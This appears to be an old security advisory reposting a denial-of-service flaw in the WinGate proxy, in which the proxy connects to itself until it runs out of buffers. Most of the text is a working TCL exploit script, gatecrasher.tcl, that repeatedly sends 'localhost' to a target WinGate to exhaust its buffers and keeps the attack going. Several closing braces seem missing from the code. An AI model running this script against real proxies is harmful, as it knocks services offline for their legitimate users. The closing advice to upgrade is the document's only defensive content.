

    Who ever uses wingate


    Matt Carothers posted  following.  His  friend discovered a  funny

        $ telnet
        Trying XXX.XX.XX.XXX...
        Connected to XXX.XX.XX.XXX.
        Escape character is '^]'.
        Connecting to host localhost...Connected

    As you can see, the WinGate  happily connects to itself.  Do  this
    enough times, and ...

        Connecting to host localhost...Out of buffers

    At this point, the WinGate stops forwarding connections.   Clients
    can still connect but  cannot make use of  it.  Below is  a simple
    TCL exploit to demonstrate the idea.


    # gatecrasher.tcl
    # This opens a WinGate and connects it to itself repeatedly until the
    # target machine runs out of buffers and stops forwarding connections.
    # The WinGate will not function as long as the script is running.
    # Credit goes to Chris Snell <> for finding the bug.
    # I apologize in advance for not being cool enough to script this is perl.
    # - Matt Carothers <>

    set host [lindex $argv 0];
    set port [lindex $argv 1];

    if {![string compare $host ""]} {
      set command [string range $argv0 [expr [string last / $argv0] + 1] end];
      puts stdout "Usage: $command <host> \[port\]";
      exit 1;

    if {![string compare $port ""]} {
      set port 23;

    if {[catch {set sock [socket $host $port]} stuff]} {
      # Could not connect for some reason.  Output an error message and exit.
      puts stdout "$host:$port : $stuff";
      exit 1;

    puts stdout "Connected to $host:$port.  Launching WinGate kill ...";

    set flag 0;

    puts $sock "localhost";
    flush $sock;

    while {[gets $sock line] >= 0} {
      if {[string match "*Connected*" $line]} {
        # We've successfully connected the WinGate to itself.
        # Whee, let's do it again.

        puts $sock "localhost";
        flush $sock;

        puts -nonewline stdout ".";
        flush stdout;

        set flag 0;
      } elseif {[string match "*Out of buffers*" $line]} {
        # The WinGate is now out of buffers.
        # We'll output a message to that effect and keep trying.  This
        # serves as a keep-alive and lets us jump in and fill any buffers
        # freed by clients which disconnect after the attack succeeds.

        if {!$flag} {
          puts stdout "\n*plink*";
          set flag 1;

        puts $sock "localhost";
        flush $sock;

    puts stdout "\nConnection lost.";


    Make upgrade.